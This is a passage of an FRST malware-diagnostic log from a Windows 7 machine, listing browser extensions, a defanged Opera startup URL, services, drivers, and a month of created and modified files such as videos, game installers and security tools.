CHR Profile: C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default [2017-08-10]
CHR Extension: (Google Slides) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-25]
CHR Extension: (Google Docs) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-21]
CHR Extension: (Google Drive) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (Google Sheets) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-25]
CHR Extension: (Google Docs Offline) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Ad.Block.Plus) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbkecbijnfiglcfogejflkcldeapodeb [2015-08-30]
CHR Extension: (Chrome Web Store Payments) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-11]
CHR Extension: (TunnelBear VPN) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\omdakjcmkglenbhjadbccaookpfjihpa [2017-08-01]
CHR Extension: (Gmail) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-21]
CHR Extension: (Chrome Media Router) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CHR HKLM-x32\...\Chrome\Extension: [ffdcfjdljhbehggjdkdioajnknjcpbjb] - C:\Program Files (x86)\DAP\DAPChrome\DAPChrome6.crx <not found>
 
Opera: 
=======
OPR StartupUrls:  "hxxp://www.surfvox.com/" 
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [441880 2016-06-14] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [421400 2016-06-14] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [458264 2016-06-14] (BlueStack Systems, Inc.)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1343408 2014-02-24] (ESET)
S3 GalaxyClientService; J:\Games\GOG Galaxy\GalaxyClientService.exe [512576 2017-05-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [7955008 2017-05-31] (GOG.com)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S2 iBtSiva; C:\Program Files (x86)\Intel\Bluetooth\ibtsiva.exe [129984 2015-04-01] (Intel Corporation)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-12-09] (Intel Corporation)
R2 LeService; C:\Program Files (x86)\Letv\LeService.exe [200624 2017-02-16] (乐视网信息技术(北京)股份有限公司)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-09-30] (Logitech Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
R2 Micro Star SCM; C:\Windows\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2014-05-29] ()
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [3916368 2016-01-09] (INCA Internet Co., Ltd.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-12-13] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2016-12-13] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [459832 2016-12-12] (NVIDIA Corporation)
R2 NVIDIA Wireless Controller Service; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe [1163712 2016-12-13] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2016-12-13] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [344576 2014-04-17] (Qualcomm Atheros) [File not signed]
R2 SEVPNSERVER; C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe [5253064 2016-06-15] (SoftEther VPN Project at University of Tsukuba, Japan.)
R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe [41472 2016-05-11] ()
R2 UDisk Monitor Z5 Phone; C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe [585416 2013-11-18] ()
R2 UPSecurityInputService; C:\Windows\SysWOW64\UPEditNew\UPService.exe [361240 2016-05-07] (中国银联股份有限公司)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S3 WsDrvInst; I:\Dr.Fone for Android\DriverInstall.exe [103736 2015-10-27] (Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3816176 2014-05-29] (Intel® Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BfLwf; C:\Windows\System32\DRIVERS\bflwfx64.sys [82096 2014-04-10] (Qualcomm Atheros, Inc.)
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-06-14] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-05-30] (Bluestack System Inc. )
R3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [87864 2014-11-05] (Motorola Solutions, Inc.)
R3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [142136 2015-01-13] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\System32\DRIVERS\btmhsf.sys [1448248 2015-01-13] (Motorola Solutions, Inc.)
R1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [193448 2017-03-03] ()
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [239320 2013-09-17] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [239296 2013-09-17] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [168256 2013-09-17] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [157432 2013-09-17] (ESET)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-06-27] ()
S3 GeneralusbserialserZ52203; C:\Windows\System32\DRIVERS\CT_U_USBSER_Z5.sys [250568 2013-11-18] (QUALCOMM Incorporated)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO64A.SYS [27552 2016-10-29] (REALiX™)
R3 ibtusb; C:\Windows\System32\DRIVERS\ibtusb.sys [254192 2015-03-19] (Intel Corporation)
R3 Ke2200; C:\Windows\System32\DRIVERS\e22w7x64.sys [129200 2014-03-27] (Qualcomm Atheros, Inc.)
R3 Larmkanal; C:\Windows\System32\DRIVERS\Larmkanal.sys [32680 2015-06-09] (Adoriasoft LLC)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [67736 2016-09-30] (Logitech Inc.)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [64280 2016-09-30] (Logitech Inc.)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188352 2017-08-09] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [101784 2017-08-10] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-08-10] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [253856 2017-08-10] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-08-10] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\Netwsw02.sys [3483112 2014-07-22] (Intel Corporation)
R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [307768 2016-12-12] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2016-12-13] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [46016 2016-12-13] (NVIDIA Corporation)
R2 PassGuard; C:\Windows\system32\drivers\PassGuard_x64.sys [111416 2016-12-05] ()
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [33672 2015-09-02] (Adoriasoft LLC)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2013-09-30] ()
S3 qcusbser; C:\Windows\System32\DRIVERS\qcusbser.sys [248864 2015-04-06] (QUALCOMM Incorporated)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [444632 2013-10-18] (Realsil Semiconductor Corporation)
R3 SEE; C:\Windows\System32\drivers\see.sys [50208 2016-06-15] (SoftEther Corporation)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [867064 2014-11-10] (Duplex Secure Ltd.)
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [38656 2015-08-10] (The OpenVPN Project)
R3 tapstrong; C:\Windows\System32\DRIVERS\tapstrong.sys [38760 2015-01-18] (The OpenVPN Project)
S3 Tosrfcom; no ImagePath
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-10 20:42 - 2017-08-10 20:42 - 000032949 _____ C:\Users\w7\Downloads\FRST.txt
2017-08-10 20:40 - 2017-08-10 20:42 - 000000000 ____D C:\FRST
2017-08-10 20:38 - 2017-08-10 20:40 - 002381824 _____ (Farbar) C:\Users\w7\Downloads\FRST64.exe
2017-08-10 14:30 - 2017-08-10 14:31 - 065365056 _____ (Oracle Corporation) C:\Users\w7\Downloads\jre-8u144-windows-x64.exe
2017-08-10 12:37 - 2017-08-10 12:40 - 005323816 _____ (Golden Frog, GmbH) C:\Users\w7\Downloads\VyprVPN-2.10.0.7514-installer.exe
2017-08-10 11:52 - 2017-08-10 11:59 - 008185288 _____ (Malwarebytes) C:\Users\w7\Downloads\AdwCleaner (1).exe
2017-08-10 11:51 - 2017-08-10 11:51 - 000000000 ____D C:\Users\w7\Desktop\temp
2017-08-10 11:43 - 2017-08-10 11:43 - 000000000 ____D C:\Users\w7\Desktop\New folder (3)
2017-08-10 11:42 - 2017-08-10 11:43 - 000610769 _____ C:\Users\w7\Downloads\depends22_x86.zip
2017-08-10 01:20 - 2017-08-10 01:20 - 004243464 _____ (Wargaming.net ) C:\Users\w7\Downloads\WoT_internet_install_asia.exe
2017-08-10 01:18 - 2017-08-10 01:19 - 003810270 _____ C:\Users\w7\Desktop\azq9Nnq_460sv.mp4
2017-08-09 14:03 - 2017-08-09 14:03 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Registry Repair.lnk
2017-08-09 14:03 - 2017-08-09 14:03 - 000001259 _____ C:\Users\Public\Desktop\Registry Repair.lnk
2017-08-09 14:03 - 2017-08-09 14:03 - 000000000 ____D C:\Users\w7\AppData\Roaming\GlarySoft
2017-08-09 14:03 - 2017-08-09 14:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glarysoft
2017-08-09 14:02 - 2017-08-09 14:02 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2017-08-09 14:01 - 2017-08-09 14:02 - 005276496 _____ C:\Users\w7\Downloads\rrsetup.exe
2017-08-09 00:31 - 2017-08-09 00:31 - 000440076 _____ C:\Users\w7\Downloads\a4GQmnp_460sv.mp4
2017-08-09 00:23 - 2017-08-09 00:23 - 001953736 _____ C:\Users\w7\Downloads\kitten.mp4
2017-08-09 00:21 - 2017-08-09 00:21 - 002368875 _____ C:\Users\w7\Downloads\The Dynasphere, a 1930 monowheel vehicle inspired by da Vinci sketch.mp4
2017-08-09 00:15 - 2017-08-09 00:16 - 005245551 _____ C:\Users\w7\Downloads\ad9LrwD_460sv.mp4
2017-08-09 00:11 - 2017-08-09 00:13 - 003891438 _____ C:\Users\w7\Downloads\ax0zeRb_460sv.mp4
2017-08-08 23:59 - 2017-08-08 23:59 - 000010251 _____ C:\Users\w7\Downloads\boruto-naruto-next-generations-english-1131691.zip
2017-08-08 23:58 - 2017-08-08 23:58 - 000009709 _____ C:\Users\w7\Downloads\boruto-naruto-next-generations-english-1116392.zip
2017-08-08 22:27 - 2017-08-08 22:27 - 001384302 _____ C:\Users\w7\Downloads\azq9owb_460sv.mp4
2017-08-08 17:06 - 2017-08-08 17:10 - 014208467 _____ C:\Users\w7\Downloads\aeer5rq_460sv.mp4
2017-08-08 16:23 - 2017-08-08 16:23 - 000000916 _____ C:\Users\w7\Desktop\Warhammer 40,000 Dawn of War III.lnk
2017-08-08 16:23 - 2017-08-08 16:23 - 000000000 ____D C:\Users\w7\AppData\Roaming\Warhammer 40,000 Dawn of War III_Uninstall
2017-08-08 15:57 - 2017-08-08 21:34 - 000000000 ____D C:\Users\w7\AppData\LocalLow\Mozilla
2017-08-08 15:57 - 2017-08-08 15:57 - 000000936 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-08-08 15:57 - 2017-08-08 15:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-08 15:55 - 2017-08-08 15:55 - 000266192 _____ (Mozilla) C:\Users\w7\Downloads\Firefox Setup Stub 54.0.1.exe
2017-08-08 14:46 - 2017-08-08 14:50 - 004204032 _____ (crosire) C:\Users\w7\Downloads\ReShade_Setup_3.0.8.exe
2017-08-08 13:02 - 2017-08-08 13:03 - 002849145 _____ C:\Users\w7\Downloads\aGeZoqK_460sv.mp4
2017-08-08 01:51 - 2017-08-08 01:52 - 006111927 _____ C:\Users\w7\Downloads\flight of the conchords.mp4
2017-08-08 01:45 - 2017-08-08 01:46 - 006142841 _____ C:\Users\w7\Downloads\av7855b_460sv.mp4
2017-08-08 01:43 - 2017-08-08 01:43 - 003663897 _____ C:\Users\w7\Downloads\take me on.mp4
2017-08-07 23:24 - 2017-08-07 23:24 - 005241639 _____ C:\Users\w7\Downloads\a6VOQ98_460sv.mp4
2017-08-07 21:06 - 2017-08-07 21:06 - 001922954 _____ C:\Users\w7\Downloads\hammerhead worm.mp4
2017-08-07 20:21 - 2017-08-07 20:21 - 006232345 _____ C:\Users\w7\Downloads\ax01XxY_460sv.mp4
2017-08-07 16:33 - 2017-08-07 16:34 - 000114233 _____ C:\Users\w7\Downloads\gfsdk_ssao_d3d11.win64.zip
2017-08-07 15:20 - 2017-08-08 05:09 - 000000000 ____D C:\Users\w7\Desktop\New folder (2)
2017-08-07 15:10 - 2017-08-07 15:10 - 000000000 ____D C:\Users\w7\AppData\Roaming\Sun
2017-08-05 13:30 - 2017-08-05 13:31 - 103693321 _____ C:\Users\w7\Downloads\com.mobile.legends_v1.2.04.1822-12041822_Android-4.0.3.apk
2017-08-04 02:30 - 2017-08-04 02:30 - 000064552 _____ C:\Users\w7\Downloads\savebt.com-BT种子下载-SIRO-2313.HD.torrent
2017-08-03 17:37 - 2017-08-03 17:37 - 000000290 _____ C:\Users\w7\Downloads\All Shipments Batch File-291-1-0.7z
2017-08-03 15:22 - 2017-08-10 18:28 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-08-03 15:22 - 2017-08-10 12:14 - 000101784 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-08-03 15:18 - 2017-08-10 12:14 - 000253856 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-08-03 15:18 - 2017-08-10 12:14 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-08-03 15:18 - 2017-08-09 12:52 - 000188352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-08-03 15:18 - 2017-08-03 15:18 - 000001879 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-08-03 15:18 - 2017-08-03 15:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-08-03 15:18 - 2017-06-27 12:06 - 000077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-08-03 15:17 - 2017-08-03 15:17 - 000000000 ____D C:\Program Files\Malwarebytes
2017-08-03 14:49 - 2017-08-03 14:49 - 007767731 _____ C:\Users\w7\Desktop\1947 HITS ARCHIVE_ Oh But I Do - Margaret Whiting (used in Agent Carter) - YouTube (480p).mp4
2017-08-03 14:10 - 2017-08-03 14:10 - 000000000 ____D C:\Users\w7\AppData\Roaming\Obsidium
2017-08-03 13:18 - 2017-08-03 13:18 - 009223984 _____ C:\Users\w7\Downloads\got mariachi.mp4
2017-08-03 00:24 - 2017-08-03 00:24 - 004212695 _____ C:\Users\w7\Downloads\mushrooms.mp4
2017-08-03 00:13 - 2017-08-03 00:13 - 003409364 _____ C:\Users\w7\Downloads\a888KX3_460sv.mp4
2017-08-03 00:10 - 2017-08-03 00:22 - 055970355 _____ C:\Users\w7\Desktop\nubia z11 nx531j twrp.zip
2017-08-02 18:57 - 2017-08-02 18:58 - 041109052 _____ C:\Users\w7\Documents\Batman of Shanghai (HD) - YouTube (720p).mp4
2017-08-02 18:27 - 2017-08-02 18:27 - 002350467 _____ C:\Users\w7\Downloads\barbie girl trump.mp4
2017-08-02 13:53 - 2017-08-02 13:53 - 004455470 _____ C:\Users\w7\Downloads\misheard lyrics.mp4
2017-08-01 22:06 - 2017-08-01 22:06 - 000000000 ____D C:\Users\w7\AppData\LocalLow\Smac
2017-08-01 18:26 - 2017-08-01 18:26 - 000001340 _____ C:\Users\w7\Desktop\icecat - Shortcut.lnk
2017-08-01 18:21 - 2017-08-01 18:21 - 000000000 ____D C:\Program Files\icecat
2017-08-01 18:18 - 2017-08-01 18:19 - 044450434 _____ C:\Users\w7\Downloads\icecat-38.8.0.en-US.win32.zip
2017-08-01 18:18 - 2017-08-01 18:18 - 005802747 _____ C:\Users\w7\Downloads\anjjZ55_460sv.mp4
2017-08-01 13:35 - 2017-08-01 13:35 - 012702200 _____ C:\Users\w7\Downloads\anjMBdB_460sv.mp4
2017-08-01 13:00 - 2017-08-01 13:00 - 000190526 _____ C:\Users\w7\Downloads\aq174jQ_460sv.mp4
2017-08-01 12:57 - 2017-08-01 12:58 - 002870031 _____ C:\Users\w7\Downloads\aWq1Bd4_460sv.mp4
2017-08-01 12:32 - 2017-08-01 12:32 - 002038247 _____ C:\Users\w7\Downloads\aKDDXj6_460sv.mp4
2017-08-01 12:20 - 2017-08-01 12:20 - 005932384 _____ C:\Users\w7\Downloads\THAI AD.mp4
2017-08-01 12:13 - 2017-08-01 12:13 - 003336064 _____ C:\Users\w7\Downloads\vr (2).mp4
2017-08-01 12:05 - 2017-08-01 12:05 - 003822652 _____ C:\Users\w7\Downloads\anjjdG0_460sv.mp4
2017-08-01 11:23 - 2017-08-01 11:23 - 000025788 _____ C:\Users\w7\Downloads\einstein-and-eddington_HI_english-194372.zip
2017-08-01 01:24 - 2017-08-01 01:25 - 035543442 _____ C:\Users\w7\Documents\Selena Gomez - Bad Liar - YouTube (1080p).mp4
2017-07-31 23:27 - 2017-07-31 23:27 - 000153456 _____ C:\Users\w7\Downloads\giphy.webp
2017-07-31 21:31 - 2017-07-31 21:31 - 006754944 _____ (ESET spol. s r.o.) C:\Users\w7\Downloads\esetonlinescanner_enu (1).exe
2017-07-31 21:28 - 2017-07-31 21:28 - 003617336 _____ (hxxp://advancedfilefixer.com/ ) C:\Users\w7\Downloads\AdvancedFileFixer_Setup.exe
2017-07-31 21:25 - 2017-07-31 21:26 - 006754944 _____ (ESET spol. s r.o.) C:\Users\w7\Downloads\esetonlinescanner_enu.exe
2017-07-31 21:18 - 2017-07-31 21:18 - 000001605 _____ C:\Users\w7\Desktop\Local - Shortcut.lnk
2017-07-31 20:35 - 2016-01-06 23:15 - 261328670 _____ C:\Users\w7\Desktop\main.23.com.worms4.app.obb
2017-07-31 20:34 - 2017-07-31 20:42 - 021756328 _____ C:\Users\w7\Downloads\Worms 4 v1.0.419806[DLC & Weapons -Unlocked].Apk
2017-07-31 20:33 - 2017-07-31 21:09 - 037705269 _____ C:\Users\w7\Downloads\open_gapps-arm64-7.1-full-20170731.zip.crdownload
2017-07-31 16:47 - 2017-07-31 17:37 - 259921709 _____ C:\Users\w7\Downloads\worms4.zip
2017-07-31 16:44 - 2017-07-31 16:49 - 021756328 _____ C:\Users\w7\Desktop\Worms 4 v1.0.419806[DLC & Weapons -Unlocked].Apk
2017-07-31 13:05 - 2017-07-31 13:05 - 021477376 _____ C:\Users\w7\Downloads\twrp-3.1.1-0-nx512j.img
2017-07-31 12:37 - 2017-07-31 12:38 - 002955265 _____ C:\Users\w7\Downloads\a6VVGg2_460sv.mp4
2017-07-31 11:09 - 2017-07-31 11:09 - 001526943 _____ C:\Users\w7\Downloads\azqqdpb_460sv.mp4
2017-07-30 15:59 - 2017-07-30 15:59 - 000000000 ____D C:\Users\w7\AppData\Local\SniperElite4
2017-07-30 15:58 - 2017-07-30 15:58 - 000000000 ____D C:\ProgramData\Sniper Elite 4
2017-07-30 15:48 - 2017-07-30 15:48 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (4).rar
2017-07-30 15:44 - 2017-07-30 15:44 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (3).rar
2017-07-30 15:41 - 2017-07-30 15:41 - 000240774 _____ C:\Users\w7\Downloads\[zmk.tw]doctor.who.2005.s10e07.720p.hdtv.x264-mtb.zip
2017-07-30 15:36 - 2017-07-30 15:36 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV (2).rar
2017-07-30 15:34 - 2017-07-30 15:34 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV (1).rar
2017-07-30 15:32 - 2017-07-30 15:32 - 000064804 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E01.720p.HDTV.x264-MTB.rar
2017-07-30 15:30 - 2017-07-30 15:30 - 000279008 _____ C:\Users\w7\Documents\Doctor.Who.2005.S10E01.720p.HDTV.HEVC.x265-iSm.ass
2017-07-30 15:20 - 2017-07-30 15:20 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (2).rar
2017-07-30 15:18 - 2017-07-30 15:18 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB (1).rar
2017-07-30 14:37 - 2017-07-30 14:37 - 000257718 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E12.720p.HDTV.x264-FoV.zip
2017-07-30 14:36 - 2017-07-30 14:36 - 000226690 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E11.720p.HDTV.x264-FoV.zip
2017-07-30 14:35 - 2017-07-30 14:35 - 000246984 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E10.720p.HDTV.x264-FoV.zip
2017-07-30 14:34 - 2017-07-30 14:34 - 000148584 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E09.720p.WEB.h264-TBS.rar
2017-07-30 14:33 - 2017-07-30 14:33 - 000242677 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E08.720p.HDTV.x264-FoV.zip
2017-07-30 14:33 - 2017-07-30 14:33 - 000158075 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E07.720p.HDTV.x264-MTB.rar
2017-07-30 14:31 - 2017-07-30 14:31 - 000143989 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E06.720p.HDTV.x264-FoV.rar
2017-07-30 14:30 - 2017-07-30 14:30 - 000250954 _____ C:\Users\w7\Downloads\[zmk.tw]doctor_who_2005.10x05.720p_hdtv_x264-fov.mkv.zip
2017-07-30 14:30 - 2017-07-30 14:30 - 000129775 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E04.720p.HDTV.x264-FoV.rar
2017-07-30 14:29 - 2017-07-30 14:29 - 000140175 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E03.720p.WEB.x264-TBS.rar
2017-07-30 14:26 - 2017-07-30 14:26 - 000160518 _____ C:\Users\w7\Downloads\[zmk.tw]Doctor.Who.2005.S10E02.720p.HDTV.x264-FoV.rar
2017-07-30 14:22 - 2017-07-30 14:22 - 000241426 _____ C:\Users\w7\Downloads\[zmk.tw]doctor.who.2005.s10e01.720p.hdtv.x264-mtb.zip
2017-07-30 14:05 - 2017-08-05 02:48 - 000000583 _____ C:\Users\Public\Desktop\Sniper Elite 4.lnk
2017-07-29 21:56 - 2017-07-29 21:56 - 005579541 _____ C:\Users\w7\Downloads\3rd rock.mp4
2017-07-29 21:49 - 2017-07-29 21:49 - 005809715 _____ C:\Users\w7\Downloads\voices.mp4
2017-07-29 21:34 - 2017-07-29 21:34 - 004654237 _____ C:\Users\w7\Downloads\talent.mp4
2017-07-29 21:19 - 2017-07-29 21:19 - 000140859 _____ C:\Users\w7\Downloads\a055pVq_460sv.mp4
2017-07-29 21:09 - 2017-07-29 21:09 - 001725168 _____ C:\Users\w7\Downloads\Mont Saint Michel is a beautiful place in France.mp4
2017-07-29 21:07 - 2017-07-29 21:07 - 003681616 _____ C:\Users\w7\Downloads\aOBz63v_460sv.mp4
2017-07-29 18:33 - 2017-07-29 18:35 - 059805361 _____ C:\Users\w7\Documents\Nubia Z17 hands-on_ the $410 flagship from China - YouTube (1080p).mp4
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-10 20:40 - 2016-08-09 03:55 - 000000000 ____D C:\Users\w7\AppData\Local\Nox
2017-08-10 20:33 - 2016-06-16 13:43 - 000000000 ____D C:\Program Files (x86)\TunnelBear
2017-08-10 20:14 - 2016-06-15 22:25 - 000000000 ____D C:\Program Files\SoftEther VPN Server
2017-08-10 19:55 - 2014-09-06 02:14 - 000000552 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2017-08-10 19:10 - 2016-08-09 03:56 - 000000000 ____D C:\Users\w7\vmlogs
2017-08-10 19:10 - 2016-08-09 03:56 - 000000000 ____D C:\Users\w7\.BigNox
2017-08-10 19:10 - 2016-02-20 00:55 - 000000000 ____D C:\Users\w7\.android
2017-08-10 14:43 - 2014-09-06 11:42 - 000000000 ____D C:\Users\w7\AppData\Roaming\vlc
2017-08-10 13:31 - 2015-08-21 17:54 - 000000000 ____D C:\Users\w7\AppData\Roaming\.strongvpn
2017-08-10 13:31 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\system32\NDF
